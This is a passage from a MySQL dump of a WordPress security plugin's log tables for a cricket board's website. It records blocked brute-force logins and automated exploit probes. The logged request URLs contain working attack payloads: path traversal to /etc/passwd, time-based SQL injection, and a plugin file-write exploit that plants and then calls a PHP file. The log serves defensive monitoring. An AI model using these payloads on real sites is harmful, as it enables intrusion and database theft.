9l6Wa','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('199.195.254.123',3351510651,'admin',0,1675133611.4122,7,'wUecOEfxbaDq8kV7QlpCWZn2','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('51.79.144.41',860852265,'admin',0,1675136978.1335,7,'URqYpXZyo7DdbnGhKJ8WVmzC','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('209.141.52.244',3515692276,'admin',0,1675140549.8115,7,'bWfl19C2vUgVt8LcnPw37JNj','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('81.88.53.6',1364735238,'admin',0,1675143114.7670,7,'3WplVBvUgbY7o14x5F6wCQcR','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('209.141.47.94',3515690846,'admin',0,1675144434.4464,7,'vGqYzSk6KsFDIyw8iJh2dbTZ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('198.98.50.216',3328324312,'admin',0,1675144648.8805,7,'kWr7YncvpNSBLmPQ5IjUTHKo','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('161.35.52.207',2703439055,'admin',0,1675145452.5146,7,'Iq9QYAVE2diLbyr1ezDHmxfW','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('13.127.205.195',226479555,'',0,1675147057.6884,55,'4s5gNDCzUtFjkruH20o8EP3x','','19|0|0|0|yorkshirecricketboard.org.uk/wp-plain.php'),('13.127.205.195',226479555,'',0,1675147061.5271,55,'8qyungBfIKh4aLiJSxFTtPwE','','19|0|0|0|yorkshirecricketboard.org.uk/qbffppqv.php'),('151.106.41.64',2540316992,'admin',0,1675148012.6653,7,'vVHC3kWmLw6naelJM45RdBYx','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('107.189.6.203',1807550155,'admin',0,1675154596.8975,7,'oG0KHFYEkpBuR5yPmWAfeJTc','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.49.96',3515691360,'admin',0,1675156657.3992,7,'S6KuaQ3GZvjm5LI1pPq0ebsf','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('47.115.24.165',796072101,'admin',0,1675157522.9228,7,'R6SMhy7avxrlJiumGZdfP0gX','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('209.141.48.210',3515691218,'admin',0,1675161358.2416,7,'HgacFY0jxJtsf1deXoAQ2N67','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('145.239.30.120',2448367224,'admin',0,1675165909.2901,7,'f34FakIU5GV9ScHuKzPjogeO','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('13.81.59.92',223427420,'admin',0,1675171420.3111,7,'gNHQZw6TSM7XdI0ohsmFyACL','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('205.185.113.218',3451482586,'admin',0,1675171650.6698,7,'N2jlP5tfod46x07kUYBvpCWR','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('13.81.59.92',223427420,'admin',0,1675173862.8011,7,'ouZKHSJ7dyrmkGacDLvfCesO','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('45.61.188.28',759020572,'admin',0,1675174450.6868,7,'E3tbWxfgcRUBoKPpFm6id1Ak','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('205.185.115.239',3451483119,'admin',0,1675175368.3471,7,'N3oVFRnkuZvdtI4E9172YbsJ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('120.27.133.69',2015069509,'admin',0,1675175510.5454,7,'cSNK8o1WVzP3q2sHODXIFUdy','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('178.128.5.109',2994734445,'admin',0,1675179090.7085,7,'0LktwQNYVGHDCja5Fn3r7sgb','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('107.189.13.99',1807551843,'admin',0,1675181656.5390,7,'dhw7GmNtoXeb30xQP5uCSlU6','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.38.18',3515688466,'',0,1675181709.9820,55,'jhYaSZ4Gd3VEFfkQeBgNbPm2','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wpcargo/includes/barcode.php'),('209.141.38.18',3515688466,'',0,1675181710.4934,55,'CoxbPgwQ0hLduN46fEODSMW8','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/wp-conf.php'),('107.189.6.203',1807550155,'admin',0,1675182853.8542,7,'ZU84DLpVKikQ3uzRXMNwj1qf','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('205.185.121.252',3451484668,'admin',0,1675184283.3529,7,'4i7VrWYlqpdOCsj9v1f8aXuo','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('93.114.235.167',1567812519,'',0,1675187845.5028,70,'KPcvUSGNF79rdZhnjtuV4y2Q','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/'),('13.127.205.195',226479555,'',0,1675192696.6839,55,'CWuF51KLvTS2eRZ3cOkgsdmJ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/seoplugins/mar.php'),('13.127.205.195',226479555,'',0,1675192701.3544,55,'r6Cn32UvdFihPsK81T4LpZ5a','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('205.185.126.99',3451485795,'admin',0,1675194339.9961,7,'fbSV2BNqz4eLMcsFnKxHuyEY','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.57.9',3515693321,'admin',0,1675208745.4861,7,'fKBtvb6erpVNWyahZnjFczsL','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php');
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('144.126.223.177',2424233905,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','khYLVrCMya8U4QqBXRJ6K2l7',0,1672755888.3264,377,'','POST',403,0,600,0,1,'',0),('185.2.5.77',3103917389,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','HAhzuaMO35ltDZ6mK7YkBSNo',0,1672763084.2656,166,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','Oc2KNWMBPCVDXkfItn0beYSl',0,1672770966.3605,174,'','POST',403,0,600,0,1,'',0),('104.131.211.138',1753469834,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','kZhavCQHVK3p8N2PztEGSunT',0,1672777970.7008,311,'','POST',403,0,600,0,1,'',0),('89.47.163.153',1496294297,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','6UN0zDSqoACvuI8RecYgX4fK',0,1672796662.7158,327,'','POST',403,0,600,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','A7QijD0F9Wc4kdMSLhbC6HBx',0,1672819775.4761,176,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6)','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','Q9ebqRBwAkc5JmYlXvDfNKu7',0,1672819775.4757,190,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','ytPITV093SpJ1aZ64oNv8Ueg',0,1672819775.6814,93,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','Kqw86bOU3k91o2gs7AVpBDrN',0,1672819775.6835,92,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wp-payeezy-pay/donate.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','XmMtz2x3bBiho5SI8E1eP6Kg',0,1672819775.7656,129,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','ylM7hEbxrJiuZTkVscNwpOtD',0,1672819775.8104,94,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2656.18 Safari\\/537.36\"}','LlE0oscDRbxAHyme9GhfQ6OK',0,1672819775.8207,94,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331\'+and+sleep(5)+or+\'','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','ZJPvGFE7e9Yw8AfdtkLCIaxn',0,1672819775.8927,101,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','7zhRr9TEb5xClZcNpn06vtkU',0,1672819775.9121,103,'','GET',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','KvBOuSpWTbEHFoweAIcq87Vr',0,1672819775.9176,108,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','cqEaCzw4f1XL0JrDt3GpbPgF',0,1672819776.0170,89,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?rest_route=/olistener/new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','GnBcyEDo5jsMKHCV6TlamUSg',0,1672819776.3087,188,'','POST',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-comments-post.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','yThMeOEDkalQHx4jm2YFU6Z5',0,1672819776.3091,198,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/options-general.php?page=smartcode','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','Rwefv5nzktT3l2P8o7DFqZXN',0,1672819776.3728,135,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=joomsport_md_load','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','cs8ArKw5BjalZxXUNO9VznqS',0,1672819776.3726,135,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','HmW4ESnrb7BZLThD9adPKoCU',0,1672819776.3733,134,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','OgCuG0WbVLZxjfqEhs14oydH',0,1672819776.3802,127,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','yN1GaCeHYhoXcvQDwlLmR3OK',0,1672819776.6078,153,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','Prky85Z27t9FTxeXdmAnvU4q',0,1672819776.6078,165,'','GET',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk:443\"}','0CKNjsEdk2p8rw3VmH1yqBif',0,1672819777.0048,133,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2JqyB7jef2T9hnSutMoKRIq5lYt.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','t29M5XJFbxmkd3YnqKP6L4lp',0,1672819777.1547,93,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','u5JdIq4EhQY8POoz3RDclLKU',0,1672819777.1525,137,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','pcuWCEo2Qa4HPT3MISftBGi8',0,1672819777.2368,107,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','mxzNjtlUaV3XOcv27ngwTiJ4',0,1672819777.2368,117,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+-','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','SOWzJ8Ky0wxtCTYaAnmbGdPo',0,1672819777.5223,108,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2JqyB7jef2T9hnSutMoKRIq5lYt.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','9GLbyuH7TdUn2ivqRYl0etQ4',0,1672819777.5649,94,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin.php?page=html2wp-settings','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','dZ7au0k6mTPfbcLzOJR5Eh9H',0,1672819777.5649,168,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','Ss1fLbJEh7pBc5admkD2ORio',0,1672819777.7800,98,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','Upy9thfos8H3TxFBLjIGOgzA',0,1672819777.7807,108,'','GET',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/imagements/images/2jqybkl4zckkn4lybc94cohxrla.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','5i2feAHxt63rsKcGRJYX4zT1',0,1672819777.9277,84,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','Ry6wn9Jq5UeuBlzkmHv830YZ',0,1672819777.9994,90,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','Znt7qsyu9IUbMHTeLB82E01x',0,1672819778.0852,84,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2JqyB7jef2T9hnSutMoKRIq5lYt.php?1=var_dump','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','qm4hNVlKzjCibkEG5IxQdSZB',0,1672819778.1232,95,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','z3uNBewsfvY6RoapQWMmjlk2',0,1672819778.3305,110,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1944.0 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk:443\\/favicon.ico\"}','qafhj2v1zVSlpFP3wRcGKdZC',0,1672819778.4287,113,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/index.php/video/?dl=aHR0cDovL2ludGVyYWN0LnNoLw==','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','zY1QaJmn9tkyhFGKRZHgb4Wd',0,1672819778.7978,109,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?rest_route=/notificationx/v1/analytics','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','I9HuQPtKF57ZJbxv2RCNesmX',0,1672819779.0066,142,'','POST',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','B7Hv4pdMLG1bxjweO869rDcm',0,1672819779.0449,135,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/uploads/html2wp/2JqyAxW1ZgB8AxXuWXXdf6duyE7.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','5BpLsgVExdjGMXOwfz3UYokJ',0,1672819779.0788,122,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','qGWh9pJ0PATDSXZmRixyrlkC',0,1672819779.2724,154,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','rolOJE0paqRGXPI9khb82cC3',0,1672819779.3148,112,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 